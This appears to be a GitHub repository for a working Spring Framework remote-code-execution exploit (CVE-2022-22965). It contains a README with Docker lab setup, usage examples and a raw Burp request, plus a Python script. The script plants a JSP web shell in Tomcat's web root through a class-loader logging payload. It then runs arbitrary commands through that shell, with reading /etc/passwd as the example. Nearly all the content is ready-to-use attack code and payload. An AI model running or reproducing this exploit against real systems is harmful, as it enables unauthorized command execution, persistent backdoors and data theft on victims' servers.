├── README.md ├── SpringFramework_CVE-2022-22965_RCE.py └── images ├── README.md ├── image-20220401121101971.png └── image-20220401121158108.png /README.md: -------------------------------------------------------------------------------- 1 | # SpringFramework_CVE-2022-22965_RCE 2 | SpringFramework 远程代码执行漏洞CVE-2022-22965 3 | ## 漏洞复现环境 4 | ``` 5 | docker pull vulfocus/spring-core-rce-2022-03-29 6 | docker run -d -p 8090:8080 --name springrce -it vulfocus/spring-core-rce-2022-03-29 7 | ``` 8 | 写webshell 9 | 注意:验证测试时Shell只能写一次, 10 | ### 利用脚本 11 | ``` 12 | python CVE-2022-22965.py http://target.com:8090 whoami 13 | ``` 14 | ![whoami](/images/image-20220401121101971.png) 15 | ``` 16 | python CVE-2022-22965.py http://target.com:8090 "cat /etc/passwd" 17 | ``` 18 | ![passwd](/images/image-20220401121158108.png) 19 | ### Burp 20 | ``` 21 | POST / HTTP/1.1 22 | Host: 127.0.0.1:8090 23 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 24 | Accept-Encoding: gzip, deflate 25 | Accept: */* 26 | Connection: close 27 | suffix: %>// 28 | c1: Runtime 29 | c2: <% 30 | DNT: 1 31 | Content-Type: application/x-www-form-urlencoded 32 | Content-Length: 761 33 | 34 | class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22S%22.equals(request.getParameter(%22Tomcat%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=Shell&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat= 35 | ``` 36 | -------------------------------------------------------------------------------- /SpringFramework_CVE-2022-22965_RCE.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import sys 3 | 4 | prox = { 5 | 'http':'http://192.168.1.117:8080' 6 | } 7 | 8 | head = { 9 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0', 10 | 'Accept-Encoding': 'gzip, deflate', 11 | 'Accept': '*/*', 12 | 'Connection': 'close', 13 | 'suffix': '%>//', 14 | 'c1': 'Runtime', 15 | 'c2': '<%', 16 | 'DNT': '1', 17 | 'Content-Type': 'application/x-www-form-urlencoded', 18 | 'Content-Length': '762', 19 | } 20 | 21 | data = 'class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22S%22.equals(request.getParameter(%22Tomcat%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=Shell&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=' 22 | 23 | def exec(): 24 | try: 25 | requests.packages.urllib3.disable_warnings() 26 | requests.post(url,headers=head,data=data,verify=False) 27 | urls = requests.get(url+'/Shell.jsp',headers={'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0'},verify=False) 28 | #print(urls.url) 29 | if urls.status_code == 200: 30 | b = requests.get(url+'/Shell.jsp?Tomcat=S&cmd='+ Cmd,headers={'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0'},verify=False).text 31 | print(b[0:1000]) 32 | except requests.exceptions.ConnectionError as e: 33 | print(e) 34 | 35 | if __name__ == '__main__': 36 | try: 37 | url = sys.argv[1] 38 | Cmd = sys.argv[2] 39 | exec() 40 | except Exception: 41 | print("CVE-2022-22965.py http://127.0.0.1:8090 whoami ") 42 | -------------------------------------------------------------------------------- /images/README.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /images/image-20220401121101971.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecNN/SpringFramework_CVE-2022-22965_RCE/708f4a7fdf39106ecc66a6af46562a75e5b70928/images/image-20220401121101971.png -------------------------------------------------------------------------------- /images/image-20220401121158108.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecNN/SpringFramework_CVE-2022-22965_RCE/708f4a7fdf39106ecc66a6af46562a75e5b70928/images/image-20220401121158108.png --------------------------------------------------------------------------------